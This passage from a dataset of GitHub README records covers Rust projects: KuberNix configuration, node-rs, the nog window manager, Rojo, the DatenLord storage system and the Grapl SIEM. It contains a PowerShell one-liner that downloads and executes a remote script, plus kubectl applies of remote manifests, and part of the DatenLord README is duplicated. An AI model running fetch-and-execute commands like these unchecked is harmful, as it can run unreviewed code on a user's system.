The\nstartup of the individual components will be initiated by YAML files called\n`run.yml`, which are available inside the directories of the corresponding\ncomponents. For example, etc gets started via:\n\n```\n> cat kubernix-run/etcd/run.yml\n```\n\n```yml\n---\ncommand: /nix/store/qlbsv0hvi0j5qj3631dzl9srl75finlk-etcd-3.3.13-bin/bin/etcd\nargs:\n - \"--advertise-client-urls=https://127.0.0.1:2379\"\n - \"--client-cert-auth\"\n - \"--data-dir=/\u2026/kubernix-run/etcd/run\"\n - \"--initial-advertise-peer-urls=https://127.0.0.1:2380\"\n - \"--initial-cluster-state=new\"\n - \"--initial-cluster-token=etcd-cluster\"\n - \"--initial-cluster=etcd=https://127.0.0.1:2380\"\n - \"--listen-client-urls=https://127.0.0.1:2379\"\n - \"--listen-peer-urls=https://127.0.0.1:2380\"\n - \"--name=etcd\"\n - \"--peer-client-cert-auth\"\n - \"--cert-file=/\u2026/kubernix-run/pki/kubernetes.pem\"\n - \"--key-file=/\u2026/kubernix-run/pki/kubernetes-key.pem\"\n - \"--peer-cert-file=/\u2026/kubernix-run/pki/kubernetes.pem\"\n - \"--peer-key-file=/\u2026/kubernix-run/pki/kubernetes-key.pem\"\n - \"--peer-trusted-ca-file=/\u2026/kubernix-run/pki/ca.pem\"\n - \"--trusted-ca-file=/\u2026/kubernix-run/pki/ca.pem\"\n```\n\n### Configuration\n\nKuberNix has some configuration possibilities, which are currently:\n\n| CLI argument | Description | Default | Environment Variable |\n| ------------------------- | ----------------------------------------------------------------------------------- | -------------- | ---------------------------- |\n| `-r, --root` | Path where all the runtime data is stored | `kubernix-run` | `KUBERNIX_ROOT` |\n| `-l, --log-level` | Logging verbosity | `info` | `KUBERNIX_LOG_LEVEL` |\n| `-c, --cidr` | CIDR used for the cluster network | `10.10.0.0/16` | `KUBERNIX_CIDR` |\n| `-s, --shell` | The shell executable to be used | `$SHELL`/`sh` | `KUBERNIX_SHELL` |\n| `-e, --no-shell` | Do not spawn an interactive shell after bootstrap | `false` | `KUBERNIX_NO_SHELL` |\n| `-n, --nodes` | The number of nodes to be registered | `1` | `KUBERNIX_NODES` |\n| `-u, --container-runtime` | The container runtime to be used for the nodes, irrelevant if `nodes` equals to `1` | `podman` | `KUBERNIX_CONTAINER_RUNTIME` |\n| `-o, --overlay` | Nix package overlay to be used | | `KUBERNIX_OVERLAY` |\n| `-p, --packages` | Additional Nix dependencies to be added to the environment | | `KUBERNIX_PACKAGES` |\n\nPlease ensure that the CIDR is not overlapping with existing local networks and\nthat your setup has access to the internet. The CIDR will be automatically split\nup over the necessary cluster components.\n\n#### Multinode Support\n\nIt is possible to spawn multiple worker nodes, too. To do this, simply adjust\nthe `-n, --nodes` command line argument as well as your preferred container\nruntime via `-u, --container-runtime`. The default runtime is [podman][41],\nbut every other Docker drop-in replacement should work out of the box.\n\n#### Overlays\n\nOverlays provide a method to extend and change Nix derivations. This means, that\nwe\u2019re able to change dependencies during the cluster bootstrapping process. 
For\nexample, we can exchange the used CRI-O version to use a local checkout by\nwriting this simple \`overlay.nix\`:\n\n\`\`\`nix\nself: super: {\n  cri-o = super.cri-o.overrideAttrs(old: {\n    src = ../path/to/go/src/github.com/cri-o/cri-o;\n  });\n}\n\`\`\`\n\nNow we can run KuberNix with the \`--overlay, -o\` command line argument:\n\n\`\`\`\n$ sudo kubernix --overlay overlay.nix\n[INFO kubernix] Nix environment not found, bootstrapping one\n[INFO kubernix] Using custom overlay 'overlay.nix'\nthese derivations will be built:\n  /nix/store/9jb43i2mqjc94mbx30d9nrx529w6lngw-cri-o-1.15.2.drv\n  building '/nix/store/9jb43i2mqjc94mbx30d9nrx529w6lngw-cri-o-1.15.2.drv'...\n\`\`\`\n\nUsing this technique makes it easy for daily development of Kubernetes\ncomponents, by simply switching sources to local paths or trying out new versions.\n\n#### Additional Packages\n\nIt is also possible to add additional packages to the KuberNix environment by\nspecifying them via the \`--packages, -p\` command line parameter. This way you\ncan easily utilize additional tools in a reproducible way. For example, when it\ncomes to always using the same [Helm][20] version, you could simply run:\n\n\`\`\`\n$ sudo kubernix -p kubernetes-helm\n[INFO ] Nix environment not found, bootstrapping one\n[INFO ] Bootstrapping cluster inside nix environment\n\u2026\n> helm init\n> helm version\nClient: &version.Version{SemVer:\"v2.14.3\", GitCommit:\"\", GitTreeState:\"clean\"}\nServer: &version.Version{SemVer:\"v2.14.3\", GitCommit:\"0e7f3b6637f7af8fcfddb3d2941fcc7cbebb0085\", GitTreeState:\"clean\"}\n\`\`\`\n\nAll available packages are listed on the [official Nix index][21].\n\n[20]: https://helm.sh\n[21]: https://nixos.org/nixos/packages.html?channel=nixpkgs-unstable\n\n## Contributing\n\nYou want to contribute to this project? Wow, thanks! 
So please just fork it and\nsend me a pull request.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "napi-rs/node-rs", "link": "https://github.com/napi-rs/node-rs", "tags": ["napi-rs", "node-api", "nodejs", "crc32c", "bcrypt", "hash", "eslint", "jieba"], "stars": 677, "description": "Node.js bindings \u2764\ufe0f Rust crates ", "lang": "Rust", "repo_lang": "", "readme": "# node-rs\n\n![](https://github.com/napi-rs/node-rs/workflows/CI/badge.svg)\n\nWhen `Node.js` meet `Rust` = \ud83d\ude80\n\n# napi-rs\n\nMake rust crates binding to Node.js use [napi-rs](https://github.com/napi-rs/napi-rs)\n\n# Support matrix\n\n| | node12 | node14 | node16 | node18 |\n| --------------------- | ------ | ------ | ------ | ------ |\n| Windows x64 | \u2713 | \u2713 | \u2713 | \u2713 |\n| Windows x32 | \u2713 | \u2713 | \u2713 | \u2713 |\n| Windows arm64 | \u2713 | \u2713 | \u2713 | \u2713 |\n| macOS x64 | \u2713 | \u2713 | \u2713 | \u2713 |\n| macOS arm64 (m chips) | \u2713 | \u2713 | \u2713 | \u2713 |\n| Linux x64 gnu | \u2713 | \u2713 | \u2713 | \u2713 |\n| Linux x64 musl | \u2713 | \u2713 | \u2713 | \u2713 |\n| Linux arm gnu | \u2713 | \u2713 | \u2713 | \u2713 |\n| Linux arm64 gnu | \u2713 | \u2713 | \u2713 | \u2713 |\n| Linux arm64 musl | \u2713 | \u2713 | \u2713 | \u2713 |\n| Android arm64 | \u2713 | \u2713 | \u2713 | \u2713 |\n| Android armv7 | \u2713 | \u2713 | \u2713 | \u2713 |\n| FreeBSD x64 | \u2713 | \u2713 | \u2713 | \u2713 |\n\n# Packages\n\n| Package | Version | Downloads | Description |\n| -------------------------------------------- | -------------------------------------------------------- | ----------------------------------------------------------------------- | ------------------------------------------------------------------------- |\n| [`@node-rs/crc32`](./packages/crc32) | ![](https://img.shields.io/npm/v/@node-rs/crc32.svg) | ![](https://img.shields.io/npm/dm/@node-rs/crc32.svg?sanitize=true) | Fastest `CRC32` implementation using `SIMD` |\n| [`@node-rs/jieba`](./packages/jieba) | ![](https://img.shields.io/npm/v/@node-rs/jieba.svg) | ![](https://img.shields.io/npm/dm/@node-rs/jieba.svg?sanitize=true) | [`jieba-rs`](https://github.com/messense/jieba-rs) binding |\n| [`@node-rs/bcrypt`](./packages/bcrypt) | ![](https://img.shields.io/npm/v/@node-rs/bcrypt.svg) | ![](https://img.shields.io/npm/dm/@node-rs/bcrypt.svg?sanitize=true) | Fastest bcrypt implementation |\n| [`@node-rs/deno-lint`](./packages/deno-lint) | ![](https://img.shields.io/npm/v/@node-rs/deno-lint.svg) | ![](https://img.shields.io/npm/dm/@node-rs/deno-lint.svg?sanitize=true) | [deno_lint](https://github.com/denoland/deno_lint) Node.js binding |\n| [`@node-rs/xxhash`](./packages/xxhash) | ![](https://img.shields.io/npm/v/@node-rs/xxhash.svg) | ![](https://img.shields.io/npm/dm/@node-rs/xxhash.svg?sanitize=true) | [`xxhash-rust`](https://github.com/DoumanAsh/xxhash-rust) Node.js binding |\n| [`@node-rs/argon2`](./packages/argon2) | ![](https://img.shields.io/npm/v/@node-rs/argon2.svg) | ![](https://img.shields.io/npm/dm/@node-rs/argon2.svg?sanitize=true) | [argon2](https://crates.io/crates/argon2) binding for Node.js. 
|\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "TimUntersberger/nog", "link": "https://github.com/TimUntersberger/nog", "tags": ["tiling-window-manager", "windows-10", "rust"], "stars": 677, "description": "A tiling window manager for Windows", "lang": "Rust", "repo_lang": "", "readme": "# Nog\n\n![preview](https://user-images.githubusercontent.com/32014449/107612664-0490ac00-6c47-11eb-9620-e754aa38b5b0.png)\n\n## Documentation\n\nhttps://timuntersberger.github.io/nog\n\n## Download\n\n### Windows\n\n```powershell\n(iwr \"https://raw.githubusercontent.com/TimUntersberger/nog/master/bin/download_release.ps1\").Content > download.ps1; ./download.ps1 master-release; rm download.ps1\n```\n\n## Known Problems\n\n### Window gets managed on wrong monitor\n\nIf you are using something like PowerLauncher for launching applications you might encounter this problem with `mutli_monitor` enabled.\n\nThe problem is that the focus returns to the previous window after PowerLauncher closes, before spawning the new window.\n\n1. PowerLauncher opens\n2. You tell it to launch notepad for example\n3. PowerLauncher closes -> focus returns to previous application\n4. notepad launches\n\nIf the previous application mentioned in step 3 is managed by nog, the workspace will change to its grid. The only way to fix this (at least that I know of) is if we implement our own application launcher that is connected with nog. \n\n## Contributions\n\n* Thank you [@ramirezmike](https://github.com/ramirezmike) for designing and implementing the graph based tile organizer\n\n## Development\n\nNog requires `nightly` rust.\n\n### Make Release\n\n```\n./bin/make_release.ps1 \n```\n\n### Serve documentation\n\nThis requires you to have [mdbook](https://github.com/rust-lang/mdBook) installed.\n\nThe command will serve the book at `https://localhost:3000` and automatically rebuild whenever you change the source.\n\n```\nmdbook serve ./book\n```\n\n### Build documentation\n\nThis requires you to have [mdbook](https://github.com/rust-lang/mdBook) installed.\n\nThe command will build the book directory and output the generated files into the docs directory.\n\n```\nmdbook build ./book\n```\n\n### Updating .ns Config Files\nWe recently changed the config scripting language to use Lua. If you need help converting your config to the new format, consult the config guide [here]( https://github.com/TimUntersberger/nog/blob/master/config.md) or feel free to post on the [documentation feedback issue](https://github.com/TimUntersberger/nog/issues/106).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "rojo-rbx/rojo", "link": "https://github.com/rojo-rbx/rojo", "tags": ["roblox-studio", "sync", "roblox", "lua"], "stars": 675, "description": "Rojo enables Roblox developers to use professional-grade software engineering tools", "lang": "Rust", "repo_lang": "", "readme": "
\n \"Rojo\"\n
\n\n
 
\n\n
\n \"Actions\n \"Latest\n \"Rojo\n \"Patreon\"\n
\n\n
\n\n**Rojo** is a tool designed to enable Roblox developers to use professional-grade software engineering tools.\n\nWith Rojo, it's possible to use industry-leading tools like **Visual Studio Code** and **Git**.\n\nRojo is designed for power users who want to use the best tools available for building games, libraries, and plugins.\n\n## Features\nRojo enables:\n\n* Working on scripts and models from the filesystem, in your favorite editor\n* Versioning your game, library, or plugin using Git or another VCS\n* Streaming \`rbxmx\` and \`rbxm\` models into your game in real time\n* Packaging and deploying your project to Roblox.com from the command line\n\nIn the future, Rojo will be able to:\n\n* Sync instances from Roblox Studio to the filesystem\n* Automatically convert your existing game to work with Rojo\n* Import custom instances like MoonScript code\n\n## [Documentation](https://rojo.space/docs)\nDocumentation is hosted in the [rojo.space repository](https://github.com/rojo-rbx/rojo.space).\n\n## Contributing\nCheck out our [contribution guide](CONTRIBUTING.md) for detailed instructions for helping work on Rojo!\n\nPull requests are welcome!\n\nRojo supports Rust 1.58.1 and newer. The minimum supported version of Rust is based on the latest versions of the dependencies that Rojo has.\n\n## License\nRojo is available under the terms of the Mozilla Public License, Version 2.0. See [LICENSE.txt](LICENSE.txt) for details.", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "datenlord/datenlord", "link": "https://github.com/datenlord/datenlord", "tags": [], "stars": 675, "description": "DatenLord, Computing Defined Storage, an application-orientated, cloud-native distributed storage system", "lang": "Rust", "repo_lang": "", "readme": "# DatenLord\n\n[![Join the chat at https://gitter.im/datenlord/datenlord](https://badges.gitter.im/datenlord/datenlord.svg)](https://gitter.im/datenlord/datenlord?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\n----\n*DatenLord* is a next-generation cloud-native distributed storage platform, which aims to meet the performance-critical storage needs of next-generation cloud-native applications, such as microservices, serverless, AI, etc. On one hand, DatenLord is designed to be a cloud-native storage system, which itself is distributed and fault-tolerant, and supports graceful upgrades. These cloud-native features make DatenLord easy to use and easy to maintain. On the other hand, DatenLord is designed as an application-orientated storage system, in that DatenLord is optimized for many performance-critical scenarios, such as databases, AI machine learning, and big data. Meanwhile, DatenLord provides a high-performance storage service for containers, which facilitates stateful applications running on top of Kubernetes (K8S). The high performance of DatenLord is achieved by leveraging the most recent technology revolutions in hardware and software, such as NVMe, non-volatile memory, asynchronous programming, and native Linux asynchronous IO support. \n\n---\n## Why DatenLord?\n\nWhy do we build DatenLord? The reason is two-fold:\n* Firstly, the recent computer hardware architecture revolution calls for storage software refactoring. The storage-related functionality inside the Linux kernel hasn't changed much in the past 10 years, when the hard-disk drive (HDD) was the main storage device. 
Nowadays, the solid-state drive (SSD) has become mainstream, not to mention the most advanced SSDs, NVMe and non-volatile memory. The performance of SSD is hundreds of times faster than HDD, in that the HDD latency is around 1~10 ms, whereas the SSD latency is around 50\u2013150 \u03bcs, the NVMe latency is around 25 \u03bcs, and the non-volatile memory latency is 350 ns. With the performance revolution of storage devices, traditional blocking-style/synchronous IO in the Linux kernel becomes very inefficient, and non-blocking-style/asynchronous IO is much more applicable. The Linux kernel community already realized that, and the Linux kernel has recently introduced a native asynchronous IO mechanism, io_uring, to improve IO performance. Besides blocking-style/synchronous IO, the context switch overhead in the Linux kernel is no longer negligible w.r.t. SSD latency. Many modern programming languages have adopted asynchronous programming, green threads, or coroutines to manage asynchronous IO tasks in user space, in order to avoid the context switch overhead introduced by blocking IO. Therefore we think it\u2019s time to build a next-generation storage system that takes advantage of the storage performance revolution as far as possible, by leveraging non-blocking/asynchronous IO, asynchronous programming, NVMe, and even non-volatile memory.\n\n* Secondly, most distributed/cloud-native systems isolate computing from storage, in that computing tasks/applications and storage systems run on dedicated clusters, respectively. This isolated architecture minimizes maintenance, in that it decouples the maintenance tasks of computing clusters and storage clusters into separate ones, such as upgrade, expansion, and migration of each cluster respectively, which is much simpler than maintaining coupled clusters. Nowadays, however, applications are dealing with much larger datasets than ever before. One notorious example is that an AI training job takes one hour to load data whereas the training job itself finishes in only 45 minutes. Therefore, isolating computing and storage makes IO very inefficient, as transferring data between applications and storage systems via the network takes quite a lot of time. Further, with the isolated architecture, applications have to be aware of the different data locations, and the varying access cost due to differences in data location, network distance, etc. DatenLord tackles the IO performance issue of the isolated architecture in a novel way, which abstracts the heterogeneous storage details and makes the differences of data location, access cost, etc., transparent to applications. Furthermore, with DatenLord, applications can assume all the data to be accessed is local, and DatenLord will access the data on behalf of applications. Besides, DatenLord can help K8S schedule jobs close to cached data, since DatenLord knows the exact location of all cached data. By doing so, applications are greatly simplified w.r.t. data access, and DatenLord can leverage the local cache, neighbor cache, and remote cache to speed up data access, so as to boost performance.\n\n----\n## Target scenarios\n\nThe main scenario for DatenLord is to facilitate high availability across multi-cloud, hybrid-cloud, multiple data centers, etc. Concretely, there are many online business providers whose business is too important to afford any downtime. 
To achieve high availability, the service providers have to leverage multi-cloud, hybrid-cloud, and multiple data centers to hopefully avoid a single point of failure in any single cloud or data center, by deploying applications and services across multiple clouds or data centers. It's relatively easy to deploy applications and services to multiple clouds and data centers, but it's much harder to duplicate all data to all clouds or all data centers in a timely manner, due to the huge data size. If data is not equally available across multiple clouds or data centers, the online business might still suffer from the single point failure of a cloud or a data center, because of data unavailability resulting from a cloud or data center failure. \n\nDatenLord can alleviate the data unavailability caused by a cloud or data center failure by caching data in multiple layers, such as a local cache, neighbor cache, remote cache, etc. Although the total data size is huge, the hot data involved in online business is usually of limited size, which is called data locality. DatenLord leverages data locality and builds a set of large-scale, distributed, and automatic cache layers to buffer hot data in a smart manner. The benefit of DatenLord is two-fold:\n* DatenLord is transparent to applications, namely DatenLord does not need any modification to applications;\n* DatenLord is high performance, in that it automatically caches data by means of data hotness, and its performance is achieved by applying different caching strategies according to target applications. For example, a least recently used (LRU) caching strategy for some kinds of random access, a most recently used (MRU) caching strategy for some kinds of sequential access, etc.\n\n----\n\n## Architecture\n\n### Single Data Center\n![DatenLord Single Data Center](docs/images/datenlord_architecture_single_data_center.svg \"DatenLord Single Data Center\")\n\n### Multiple Data Centers and Hybrid Cloud\n![DatenLord Multiple Data Centers and Hybrid Cloud](docs/images/datenlord_architecture_multi_data_center.svg \"DatenLord Multiple Data Centers and Hybrid Cloud\")\n\nDatenLord provides 3 kinds of user interfaces: a KV interface, an S3 interface and a file interface. The backend storage is supported by the underlying distributed cache layer, which is strongly consistent. The strong consistency is guaranteed by the metadata management module, which is built on a high-performance consensus protocol. The persistence storage layer can be local disk or S3 storage. For the network, RDMA is used to provide high-throughput and low-latency networking. If RDMA is not supported, TCP is an alternative option. For the multiple data center and hybrid cloud scenario, there will be a dedicated metadata server which serves metadata requests within the same data center. In the single data center scenario, the metadata module can run on the same machine as the cache node. The network between data centers and public clouds is managed by a private network to guarantee high-quality data transfer. 
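\n\nAs a rough illustration of the multi-layer cache read path described above (local cache first, then neighbor cache, then the remote persistence layer), here is a hypothetical Rust sketch; the types and names are illustrative only, not DatenLord's actual API:\n\n\`\`\`rust\nuse std::collections::HashMap;\n\n// Hypothetical sketch, not DatenLord's actual API: a tiered read path that\n// tries the local cache, then a neighbor node's cache, then remote storage.\nstruct TieredCache {\n    local: HashMap<u64, Vec<u8>>,\n    neighbor: HashMap<u64, Vec<u8>>,\n    remote: HashMap<u64, Vec<u8>>, // stands in for the persistence layer (disk/S3)\n}\n\nimpl TieredCache {\n    /// Look the block up tier by tier; promote a hit into the local cache\n    /// so that the next access is served at local speed.\n    fn read(&mut self, key: u64) -> Option<Vec<u8>> {\n        if let Some(v) = self.local.get(&key) {\n            return Some(v.clone());\n        }\n        let found = self.neighbor.get(&key).or_else(|| self.remote.get(&key)).cloned();\n        if let Some(v) = &found {\n            self.local.insert(key, v.clone()); // promotion on a non-local hit\n        }\n        found\n    }\n}\n\nfn main() {\n    let mut cache = TieredCache {\n        local: HashMap::new(),\n        neighbor: HashMap::new(),\n        remote: HashMap::from([(42, b\"hot data\".to_vec())]),\n    };\n    assert_eq!(cache.read(42).as_deref(), Some(&b\"hot data\"[..]));\n    // The second read is a local hit thanks to promotion.\n    assert!(cache.local.contains_key(&42));\n}\n\`\`\`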
\n\n\n\n## Quick Start\nCurrently DatenLord has been built as Docker images and can be deployed via K8S.\n\nTo deploy DatenLord via K8S, simply run:\n* \`sed -e 's/e2e_test/latest/g' scripts/datenlord.yaml > datenlord-deploy.yaml\`\n* \`kubectl apply -f datenlord-deploy.yaml\`\n\nTo use DatenLord, just define a PVC using the DatenLord Storage Class, and then deploy a Pod using this PVC:\n\`\`\`\ncat <<EOF >datenlord-demo.yaml\napiVersion: v1\nkind: PersistentVolumeClaim\nmetadata:\n  name: pvc-datenlord-test\nspec:\n  accessModes:\n    - ReadWriteOnce\n  volumeMode: Filesystem\n  resources:\n    requests:\n      storage: 100Mi\n  storageClassName: csi-datenlord-sc\n\n---\napiVersion: v1\nkind: Pod\nmetadata:\n  name: mysql-datenlord-test\nspec:\n  containers:\n    - name: mysql\n      image: mysql\n      env:\n        - name: MYSQL_ROOT_PASSWORD\n          value: \"rootpasswd\"\n      volumeMounts:\n        - mountPath: /var/lib/mysql\n          name: data\n          subPath: mysql\n  volumes:\n    - name: data\n      persistentVolumeClaim:\n        claimName: pvc-datenlord-test\nEOF\n\nkubectl apply -f datenlord-demo.yaml\n\`\`\`\nDatenLord provides a customized scheduler which implements the K8S [scheduler extender](https://github.com/kubernetes/enhancements/blob/0e4d5df19d396511fe41ed0860b0ab9b96f46a2d/keps/sig-scheduling/1819-scheduler-extender/README.md). The scheduler will try to schedule a pod to the node that has the volume that it requests. To use the scheduler, add \`schedulerName: datenlord-scheduler\` to the spec of your pod. Caveat: a dangling docker image may cause a \`failed to parse request\` error. Doing \`docker image prune\` on each K8S node is a way to fix it. \n\nThe snapshot CRD and controller may need to be installed on K8S if the K8S CSI snapshot feature is used:\n* \`kubectl apply -f https://raw.githubusercontent.com/kubernetes-csi/external-snapshotter/master/client/config/crd/snapshot.storage.k8s.io_volumesnapshots.yaml\`\n* \`kubectl apply -f https://raw.githubusercontent.com/kubernetes-csi/external-snapshotter/master/client/config/crd/snapshot.storage.k8s.io_volumesnapshotcontents.yaml\`\n* \`kubectl apply -f https://raw.githubusercontent.com/kubernetes-csi/external-snapshotter/master/client/config/crd/snapshot.storage.k8s.io_volumesnapshotclasses.yaml\`\n* \`kubectl apply -f https://raw.githubusercontent.com/kubernetes-csi/external-snapshotter/master/deploy/kubernetes/snapshot-controller/rbac-snapshot-controller.yaml\`\n* \`kubectl apply -f https://raw.githubusercontent.com/kubernetes-csi/external-snapshotter/master/deploy/kubernetes/snapshot-controller/setup-snapshot-controller.yaml\`\n\n## Monitoring\n\nThe DatenLord monitoring guideline is in [datenlord monitoring](docs/datenlord_monitoring.md). We provide both \`YAML\` and \`Helm\` methods to deploy the monitoring system.\n\nTo use the \`YAML\` method, just run\n\`\`\`\nsh ./scripts/datenlord-monitor-deploy.sh\n\`\`\`\nTo use the \`Helm\` method, run\n\`\`\`\nsh ./scripts/datenlord-monitor-deploy.sh helm\n\`\`\`\n\n## Performance Test\n\nPerformance testing is done with [fio](https://github.com/axboe/fio), and [fio-plot](https://github.com/louwrentius/fio-plot) is used to plot performance histograms. 
\n\nTo run the performance test:\n\`\`\`\nsudo apt-get update\nsudo apt-get install -y fio python3-pip\nsudo pip3 install matplotlib numpy fio-plot\nsh ./scripts/fio_perf_test.sh TEST_DIR\n\`\`\`\n\nFour histograms will be generated:\n- Random read IOPS and latency for different block sizes\n- Random write IOPS and latency for different block sizes\n- Random read IOPS and latency for different read thread numbers with 4k block size\n- Random write IOPS and latency for different write thread numbers with 4k block size\n\nThe performance test is added to GitHub Actions ([cron.yml](.github/workflows/cron.yml)), and a performance report is generated and archived as artifacts ([Example](https://github.com/datenlord/datenlord/actions/runs/1650821578)) every four hours.\n\n## How to Contribute\n\nAnyone interested in DatenLord is welcome to contribute.\n\n### Coding Style\n\nPlease follow the [code style](docs/coding_style.md). Meanwhile, DatenLord adopts very strict clippy linting; please fix every clippy warning before submitting your PR. Also please make sure all CI tests pass.\n\n### Continuous Integration (CI)\n\nThe CI of DatenLord leverages GitHub Actions. There are two CI flows for DatenLord: [one](.github/workflows/ci.yml) is for Rust cargo tests, clippy lints, and standard filesystem E2E checks; [the other](.github/workflows/cron.yml) is for CSI-related tests, such as the CSI sanity test and the CSI E2E test.\n\nThe CSI E2E test setup is a bit complex, and its action script [cron.yml](.github/workflows/cron.yml) is quite long, so let's explain it in detail:\n* First, it sets up a test K8S cluster with one master node and three slave nodes, using Kubernetes in Docker (KinD);\n\n* Second, the CSI E2E test requires passwordless SSH login to each K8S slave node, since it might run some commands to prepare the test environment or verify test results, so it has to set up an SSH key for each Docker container of the KinD slave nodes;\n\n* Third, it builds the DatenLord container images and loads them into KinD. This is a caveat of KinD: KinD puts K8S nodes inside Docker containers, so kubelet cannot reach any resource of the local host, and KinD provides a load operation to make container images from the local host visible to kubelet;\n\n* At last, it deploys DatenLord to the test K8S cluster, then downloads the pre-built K8S E2E binary, runs it in parallel by invoking \`ginkgo -p\`, and only selects \`External.Storage\` related CSI E2E testcases to run.\n\n### Sub-Projects\n\nDatenLord has several related sub-projects, mostly work in progress, listed alphabetically:\n* [async-fuse](./src/async_fuse) Native async Rust library for FUSE;\n* [async-rdma](https://github.com/datenlord/async-rdma) Async and safe Rust library for RDMA;\n* [etcd-client](https://github.com/datenlord/etcd-client) Async etcd client SDK in Rust;\n* [lockfree-cuckoohash](https://github.com/datenlord/lockfree-cuckoohash) Lock-free hashmap in Rust;\n* [LordOS](https://github.com/datenlord/LordOS) Pure containerized Linux distribution;\n* [ring-io](https://github.com/datenlord/ring-io) Async and safe Rust library for io_uring;\n* [s3-server](https://github.com/datenlord/s3-server) S3 server in Rust.\n\n## Road Map\n- [ ] 0.1 Refactor the async fuse lib to provide clear async APIs, which are used by the datenlord filesystem.\n- [ ] 0.2 Support all FUSE APIs in the datenlord fs.\n- [ ] 0.3 Make the fuse lib fully asynchronous. 
To run the performance test:\n```\nsudo apt-get update\nsudo apt-get install -y fio python3-pip\nsudo pip3 install matplotlib numpy fio-plot\nsh ./scripts/fio_perf_test.sh TEST_DIR\n```\n\nFour histograms will be generated:\n- Random read IOPS and latency for different block sizes\n- Random write IOPS and latency for different block sizes\n- Random read IOPS and latency for different read thread numbers with 4k block size\n- Random write IOPS and latency for different write thread numbers with 4k block size\n\nThe performance test is run by a GitHub Action ([cron.yml](.github/workflows/cron.yml)) every four hours, and a performance report is generated and archived as artifacts ([Example](https://github.com/datenlord/datenlord/actions/runs/1650821578)).\n\n## How to Contribute\n\nAnyone interested in DatenLord is welcome to contribute.\n\n### Coding Style\n\nPlease follow the [code style](docs/coding_style.md). DatenLord adopts very strict clippy linting; please fix every clippy warning before submitting your PR, and make sure all CI tests pass.\n\n### Continuous Integration (CI)\n\nThe CI of DatenLord leverages GitHub Actions. There are two CI flows for DatenLord: [one](.github/workflows/ci.yml) is for Rust cargo tests, clippy lints, and standard filesystem E2E checks; [the other](.github/workflows/cron.yml) is for CSI-related tests, such as the CSI sanity test and the CSI E2E test.\n\nThe CSI E2E test setup is a bit complex and its action script [cron.yml](.github/workflows/cron.yml) is quite long, so let's walk through it in detail:\n* First, it sets up a test K8S cluster with one master node and three slave nodes, using Kubernetes in Docker (KinD);\n\n* Second, the CSI E2E test requires password-less SSH login to each K8S slave node, since it may run commands to prepare the test environment or verify test results, so it sets up an SSH key in each Docker container of the KinD slave nodes;\n\n* Third, it builds the DatenLord container images and loads them into KinD. This is a caveat of KinD: KinD puts K8S nodes inside Docker containers, so kubelet cannot reach any resource of the local host, and KinD provides a load operation to make container images from the local host visible to kubelet;\n\n* At last, it deploys DatenLord to the test K8S cluster, downloads the pre-built K8S E2E binary, runs it in parallel by invoking `ginkgo -p`, and selects only the `External.Storage` related CSI E2E test cases to run.\n\n### Sub-Projects\n\nDatenLord has several related sub-projects, mostly works in progress, listed alphabetically:\n* [async-fuse](./src/async_fuse) Native async Rust library for FUSE;\n* [async-rdma](https://github.com/datenlord/async-rdma) Async and safe Rust library for RDMA;\n* [etcd-client](https://github.com/datenlord/etcd-client) Async etcd client SDK in Rust;\n* [lockfree-cuckoohash](https://github.com/datenlord/lockfree-cuckoohash) Lock-free hashmap in Rust;\n* [LordOS](https://github.com/datenlord/LordOS) Pure containerized Linux distribution;\n* [ring-io](https://github.com/datenlord/ring-io) Async and safe Rust library for io_uring;\n* [s3-server](https://github.com/datenlord/s3-server) S3 server in Rust.\n\n## Road Map\n- [ ] 0.1 Refactor the async fuse lib to provide clear async APIs, which are used by the datenlord filesystem.\n- [ ] 0.2 Support all FUSE APIs in the datenlord fs.\n- [ ] 0.3 Make the fuse lib fully asynchronous. Switch the async fuse lib's device communication channel from blocking I/O to `io_uring`.\n- [ ] 0.4 Complete K8S integration test.\n- [ ] 0.5 Support RDMA.\n- [ ] 1.0 Complete Tensorflow K8S integration and finish performance comparison with raw fs.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "grapl-security/grapl", "link": "https://github.com/grapl-security/grapl", "tags": [], "stars": 675, "description": "Graph platform for Detection and Response", "lang": "Rust", "repo_lang": "", "readme": "

\n \n

\n\n# Grapl\nGrapl is a graph-based SIEM platform built by-and-for incident response engineers.\n\n## NOTICE\nGrapl has ceased operations as a company. As such, this code is no\nlonger being actively developed, but will remain available in an\narchived state.\n\n## Details\nGrapl leverages graph data structures at its core to ensure that you \ncan query and connect your data efficiently, model complex attacker behaviors for detection, and\neasily delve into suspicious behaviors to understand the full scope of an\nongoing intrusion.\n\nFor a more in depth overview of Grapl, read [this](https://insanitybit.github.io/2019/03/09/grapl).\n\nEssentially, Grapl will take raw logs, convert them into graphs, and\nmerge those graphs into a Master Graph. It will then orchestrate the\nexecution of your attack signatures, and provide tools for performing\nyour investigations. \n\nYou can watch some of our talks at [at\nBSidesLV](https://www.youtube.com/watch?v=LjCtbpXQA9U&t=8028s) or\n[at BSides San\nFrancisco](https://www.youtube.com/watch?v=uErWRAJ4I4w).\n\nGrapl natively supports nodes for:\n- Processes\n- Files\n- Networking\n\nGrapl natively supports the following input formats to generate graphs:\n- Sysmon logs\n- osquery logs\n- a generic JSON log format\n\nGrapl is being developed with plugins in mind - operators can easily\nsupport new input log formats and new node types.\n\nKeep in mind that Grapl is not yet at a stable, 1.0 state, and is a\nfast moving project. Expect some minor bugs and breaking changes!\n\n[Key Features](https://github.com/grapl-security/grapl#key-features)\n\n[Setup](https://github.com/grapl-security/grapl#setup)\n\nQuestions? Try opening an issue in this repo, or joining the [Grapl\nslack channel (Click for\ninvite)](https://join.slack.com/t/grapl-dfir/shared_invite/zt-armk3shf-nuY19fQQuUnYk~dHltUPCw).\n\n## Key Features\n\n**Identity**\n\nIf you\u2019re familiar with log sources like Sysmon, one of the best\nfeatures is that processes are given identities. Grapl applies the\nsame concept but for any supported log type, taking pseudo identifiers\nsuch as process ids and discerning canonical identities.\n\nGrapl then combines this identity concept with its graph approach,\nmaking it easy to reason about entities and their behaviors. Further,\nthis identity property means that Grapl stores only unique information\nfrom your 